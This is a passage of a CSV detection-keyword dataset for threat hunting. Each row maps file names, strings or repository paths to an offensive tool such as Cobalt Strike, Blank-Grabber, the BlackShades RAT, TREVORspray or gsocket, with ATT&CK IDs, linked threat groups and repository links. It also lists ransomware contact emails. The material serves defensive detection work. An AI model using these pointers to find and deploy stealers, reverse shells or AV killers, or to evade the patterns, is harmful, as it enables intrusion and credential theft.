"*bkerberos_ticket_use*",".{0,1000}bkerberos_ticket_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36004"
"*bkeylogger*",".{0,1000}bkeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36005"
"*bks2john.py*",".{0,1000}bks2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","36007"
"*blackarch.cs.nycu.edu.tw/*/os/*",".{0,1000}blackarch\.cs\.nycu\.edu\.tw\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36008"
"*blackarch.leneveu.fr/*/os/*",".{0,1000}blackarch\.leneveu\.fr\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36009"
"*blackarch.mirror.digitalpacific.com.au/*/os/*",".{0,1000}blackarch\.mirror\.digitalpacific\.com\.au\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36010"
"*blackarch.mirror.garr.it/mirrors/blackarch/*/os/*",".{0,1000}blackarch\.mirror\.garr\.it\/mirrors\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36011"
"*blackarch.org/blackarch/*/os/*",".{0,1000}blackarch\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36012"
"*blackarch.org/blackarch/blackarch/*/os/*",".{0,1000}blackarch\.org\/blackarch\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36013"
"*blackarch.unixpeople.org/*/os/*",".{0,1000}blackarch\.unixpeople\.org\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","36014"
"*blackarch/tree/master/packages/rustcat*",".{0,1000}blackarch\/tree\/master\/packages\/rustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","36015"
"*blackarrowsec/mssqlproxy*",".{0,1000}blackarrowsec\/mssqlproxy.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","36016"
"*blackarrowsec/pivotnacci*",".{0,1000}blackarrowsec\/pivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","36017"
"*blacklanternsecurity/MANSPIDER*",".{0,1000}blacklanternsecurity\/MANSPIDER.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","36018"
"*blacklanternsecurity/trevorproxy*",".{0,1000}blacklanternsecurity\/trevorproxy.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","36019"
"*blacklanternsecurity/TREVORspray*",".{0,1000}blacklanternsecurity\/TREVORspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","36020"
"*Blackout.exe *",".{0,1000}Blackout\.exe\s.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","36021"
"*Blackshades Database Viewer*",".{0,1000}Blackshades\sDatabase\sViewer.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","36022"
"*Blackshades NET Web Server*",".{0,1000}Blackshades\sNET\sWeb\sServer.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","36023"
"*BlackShell256/ShellPwnsh*",".{0,1000}BlackShell256\/ShellPwnsh.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","36024"
"*blacksnaketeam@armormail.net*",".{0,1000}blacksnaketeam\@armormail\.net.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36025"
"*blacksnaketeam@dnmx.org*",".{0,1000}blacksnaketeam\@dnmx\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36026"
"*blacksnaketeam@evilmail.to*",".{0,1000}blacksnaketeam\@evilmail\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36027"
"*blacksnaketeam@onionmail.org*",".{0,1000}blacksnaketeam\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36028"
"*blacksnaketeam@protonmail.com*",".{0,1000}blacksnaketeam\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36029"
"*BlackSnufkin/GhostDriver*",".{0,1000}BlackSnufkin\/GhostDriver.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","36030"
"*BlackSnufkin/NovaLdr*",".{0,1000}BlackSnufkin\/NovaLdr.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","36031"
"*Blank Grabber [Builder]""",".{0,1000}Blank\sGrabber\s\[Builder\]\""","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36032"
"*Blank Grabber [Fake Error Builder]""",".{0,1000}Blank\sGrabber\s\[Fake\sError\sBuilder\]\""","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36033"
"*Blank Grabber [File Pumper]""",".{0,1000}Blank\sGrabber\s\[File\sPumper\]\""","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36034"
"*Blank-c/Blank-Grabber*",".{0,1000}Blank\-c\/Blank\-Grabber.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","36035"
"*Blank-c/BlankOBF*",".{0,1000}Blank\-c\/BlankOBF.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","1","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","36036"
"*BlankOBF v2: Obfuscates Python code to make it unreadable and hard to reverse*",".{0,1000}BlankOBF\sv2\:\sObfuscates\sPython\scode\sto\smake\sit\sunreadable\sand\shard\sto\sreverse.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","36037"
"*BlankOBF v2: Obfuscates Python code to make it unreadable and hard to reverse*",".{0,1000}BlankOBF\sv2\:\sObfuscates\sPython\scode\sto\smake\sit\sunreadable\sand\shard\sto\sreverse.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","36038"
"*ble_recon.go*",".{0,1000}ble_recon\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","36039"
"*blendin/3snake*",".{0,1000}blendin\/3snake.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","36040"
"*blindSQLPayloads.txt*",".{0,1000}blindSQLPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","36041"
"*blitz /* */etc/*",".{0,1000}blitz\s\/.{0,1000}\s.{0,1000}\/etc\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36042"
"*blitz -l",".{0,1000}blitz\s\-l","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36043"
"*blitz -s *",".{0,1000}blitz\s\-s\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36044"
"*blockchain2john.py*",".{0,1000}blockchain2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","36045"
"*blockdlls -*",".{0,1000}blockdlls\s\-.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","36046"
"*blockdlls start*",".{0,1000}blockdlls\sstart.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36047"
"*blockdlls stop*",".{0,1000}blockdlls\sstop.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36048"
"*BlockNewProcClient.exe -*",".{0,1000}BlockNewProcClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","36049"
"*BlockNewProcDrv_x64.sys*",".{0,1000}BlockNewProcDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","36050"
"*BlockOpenHandle.cpp*",".{0,1000}BlockOpenHandle\.cpp.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36051"
"*BlockOpenHandle.exe*",".{0,1000}BlockOpenHandle\.exe.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36052"
"*BlockOpenHandle.vcxproj*",".{0,1000}BlockOpenHandle\.vcxproj.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36053"
"*BlockOpenHandle-main*",".{0,1000}BlockOpenHandle\-main.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","36054"
"*blog.gentilkiwi.com/securite/vol-de-session-rdp*",".{0,1000}blog\.gentilkiwi\.com\/securite\/vol\-de\-session\-rdp.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","36055"
"*blog.lexfo.fr/sshimpanzee.html*",".{0,1000}blog\.lexfo\.fr\/sshimpanzee\.html.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","36056"
"*bloginuser*",".{0,1000}bloginuser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 